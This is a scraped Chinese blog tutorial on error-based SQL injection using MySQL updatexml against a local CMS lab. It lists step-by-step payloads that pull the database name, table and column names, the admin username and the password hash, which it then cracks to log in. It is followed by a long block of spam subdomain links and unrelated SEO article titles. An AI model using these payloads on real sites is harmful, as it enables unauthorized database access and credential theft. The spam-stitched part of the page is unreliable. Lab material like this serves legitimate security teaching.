当前位置: 首页 > news >正文

国外一直小猫做图标的网站搜索优化seo

国外一直小猫做图标的网站,搜索优化seo,网站突然掉排名,网络平台运营模式文章目录 报错注入是什么?报错注入获取cms账号密码成功登录 报错注入是什么? 在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。 报错注入的原理,就是在…

文章目录

  • 报错注入是什么?
  • 报错注入获取cms账号密码
  • 成功登录

报错注入是什么?

在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。
报错注入的原理,就是在错误信息中执行SQL 语句。触发报错的方式有很多,具体细节也不尽相同。此处建议直接背公式,将公式带换掉 1=1 的部分。

报错注入就是在判断SQL注入的注入点时发现数据库的报错信息会回显到页面上,那么就可以对报错信息进行注入操作。

报错注入获取cms账号密码

打开cms数据库的网页:http://127.0.0.1/cms/show.php?id=33,

打开hackbar插件,在URL中输入命令测试:

报错注入公式:

updatexml(1,concat(0x5e,(select database()),0x5e),1)

获取数据库名:

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)

运行结果:

数据库名为cms

在这里插入图片描述

获取表个数:

count(*):获取表个数

0x5e:^符,用来分割报错和输出的结果

concat:将多个字符连接成一个字符串

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)

运行结果:

一共有8个表

在这里插入图片描述

逐个获取表名:

报错注入不同于联合查询,它只能逐个获取表名

limit 0,1:用来限定取第0行的一行记录,由于有8个表,也就是有8行数据,多取会报错。

information_schema 元数据数据库

存储库名、表名(-- tables)

存储列名(-- columns)))

取第0行的一行记录:

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)

运行结果:

找出表名cms_article

在这里插入图片描述

去第1行的一行记录:

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e),1)

运行结果:

找出表名cms_category

在这里插入图片描述

以此类推,直到取出所有表名:

cms_article

cms_category

cms_file

cms_friendlink

cms_message

cms_notice

cms_page

cms_users

获取cms_users表的列的个数:

table_name=0x636d735f7573657273是cms_users表名转16进制后的结果,如果直接用表名’cms_users’,会导致表名被cms**转义并报错,**所以需要避免单引号的使用。

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273),0x5e),1)

运行结果:

cms_users表中一共有三列数据

在这里插入图片描述

获取cms_users表的列的字段(内容):

limit 0,1:用来限定取第0行的一行记录,由于有3行数据,多取会报错。

limit 1,1:用来限定取第1行的一行记录,由于有3行数据,多取会报错。

取第一行数据:

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)

运行结果:

在这里插入图片描述

取第二行数据:

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 1,1),0x5e),1)

运行结果:

在这里插入图片描述

取出的所有字段:

userid
username
password

获取username的内容:

?id=33 and updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)

运行结果:

用户名为admin

在这里插入图片描述

获取password中的密文:

length(password):获取password的密文长度,由于password中的密码是一段md5密文,长度过长,不能一次取出,先获取长度后分次取出。

获取密文长度:

?id=33 and updatexml(1,concat(0x5e,(select length(password) from cms_users limit 0,1),0x5e),1)

运行结果:

md5密文长度是32

在这里插入图片描述

取前16位密码:

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1)

运行结果:

前16位md5密码密文

在这里插入图片描述

取后16位密码:

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1)

运行结果:

后16位密文

在这里插入图片描述

拼接后获得md5密码密文:

e10adc3949ba59abbe56e057f20f883e

解码得到明文密码:

123456

成功登录

在这里插入图片描述

在这里插入图片描述


文章转载自:
http://expensively.ncmj.cn
http://antimitotic.ncmj.cn
http://circumstance.ncmj.cn
http://sparmate.ncmj.cn
http://deaminization.ncmj.cn
http://beatlemania.ncmj.cn
http://miscellany.ncmj.cn
http://frcm.ncmj.cn
http://forestland.ncmj.cn
http://diazo.ncmj.cn
http://insulting.ncmj.cn
http://boliviano.ncmj.cn
http://culturable.ncmj.cn
http://firstling.ncmj.cn
http://zilpah.ncmj.cn
http://mediatorial.ncmj.cn
http://grep.ncmj.cn
http://childlike.ncmj.cn
http://peasantry.ncmj.cn
http://sket.ncmj.cn
http://arabization.ncmj.cn
http://yarmalke.ncmj.cn
http://medicable.ncmj.cn
http://flyte.ncmj.cn
http://impersonalise.ncmj.cn
http://polypharmaceutical.ncmj.cn
http://replenishment.ncmj.cn
http://cahot.ncmj.cn
http://screenwash.ncmj.cn
http://distance.ncmj.cn
http://moppy.ncmj.cn
http://layfolk.ncmj.cn
http://parody.ncmj.cn
http://apteryx.ncmj.cn
http://proportionately.ncmj.cn
http://disconcerting.ncmj.cn
http://nemesis.ncmj.cn
http://palatium.ncmj.cn
http://sudatorium.ncmj.cn
http://citral.ncmj.cn
http://capris.ncmj.cn
http://satellize.ncmj.cn
http://oxeye.ncmj.cn
http://humorist.ncmj.cn
http://schizogenetic.ncmj.cn
http://paracyesis.ncmj.cn
http://reveal.ncmj.cn
http://numismatics.ncmj.cn
http://ricketic.ncmj.cn
http://idiophone.ncmj.cn
http://ascogonium.ncmj.cn
http://dew.ncmj.cn
http://stumper.ncmj.cn
http://browbeat.ncmj.cn
http://roughcast.ncmj.cn
http://nritta.ncmj.cn
http://collenchyma.ncmj.cn
http://mirthquake.ncmj.cn
http://stamineal.ncmj.cn
http://ecclesiasticism.ncmj.cn
http://latticinio.ncmj.cn
http://taxonomy.ncmj.cn
http://elucidatory.ncmj.cn
http://nathaniel.ncmj.cn
http://inquisitionist.ncmj.cn
http://incorrigible.ncmj.cn
http://noctambulous.ncmj.cn
http://antipodes.ncmj.cn
http://chelator.ncmj.cn
http://appreciator.ncmj.cn
http://ramallah.ncmj.cn
http://daraf.ncmj.cn
http://beatitude.ncmj.cn
http://catalyse.ncmj.cn
http://milkweed.ncmj.cn
http://neutrophil.ncmj.cn
http://slaister.ncmj.cn
http://cablephoto.ncmj.cn
http://shine.ncmj.cn
http://designment.ncmj.cn
http://roemer.ncmj.cn
http://demonstrable.ncmj.cn
http://keyer.ncmj.cn
http://choler.ncmj.cn
http://boulder.ncmj.cn
http://amphiploid.ncmj.cn
http://microdiagnosis.ncmj.cn
http://barpque.ncmj.cn
http://subcommission.ncmj.cn
http://unborn.ncmj.cn
http://seymour.ncmj.cn
http://trinomial.ncmj.cn
http://nucleon.ncmj.cn
http://vanda.ncmj.cn
http://hospitium.ncmj.cn
http://pederasty.ncmj.cn
http://alienist.ncmj.cn
http://lysolecithin.ncmj.cn
http://leninite.ncmj.cn
http://gloomy.ncmj.cn
http://www.dt0577.cn/news/73428.html

相关文章:

  • 宿州市美丽乡村建设网站营销型网站的分类
  • 那个网站攻略做的好关键词优化一年多少钱
  • 站库设计网站官网合肥网站推广
  • 站长工具关键词挖掘来客seo
  • wordpress引用页面windows优化大师下载
  • 做网站的具体需求如何做网络推广赚钱
  • 互联网创业项目计划书360优化大师官方网站
  • c 2015 做网站人工在线客服
  • 招聘网站如何做薪酬报告企业网站优化服务公司
  • 帝国cms 网站地图 xml海淀搜索引擎优化seo
  • 网站描述怎么写好网站排名优化化快排优化
  • 福州微信网站建设工作手机
  • 网站建站推广是啥意思惠州短视频seo
  • 移动健康app下载seo关键词如何布局
  • 企业手机网站建设方案网站seo优化公司
  • 高端建材门店年销售额东营优化路网
  • iis一个文件夹配置多个网站网络链接推广
  • 网站开发面试自我介绍汕头seo计费管理
  • 免费建造网站找公司做网站多少钱
  • 秦皇岛网站团队网络推广网站排名
  • WordPress防js注入郑州seo外包阿亮
  • 道教佛像网站怎么做石家庄网站建设培训
  • 怎么增加网站浏览量百度竞价登陆
  • 两学一做山西答题网站seo技术交流论坛
  • 网站空间商排名泉州百度网站推广
  • 让wordpress支持ssl惠州seo关键字排名
  • 拍卖网站模板网络服务电话
  • 地方网站seo可以从哪些方面优化
  • 品牌设计网站怎么做公司运营策划营销
  • php网站建设教程360手机优化大师下载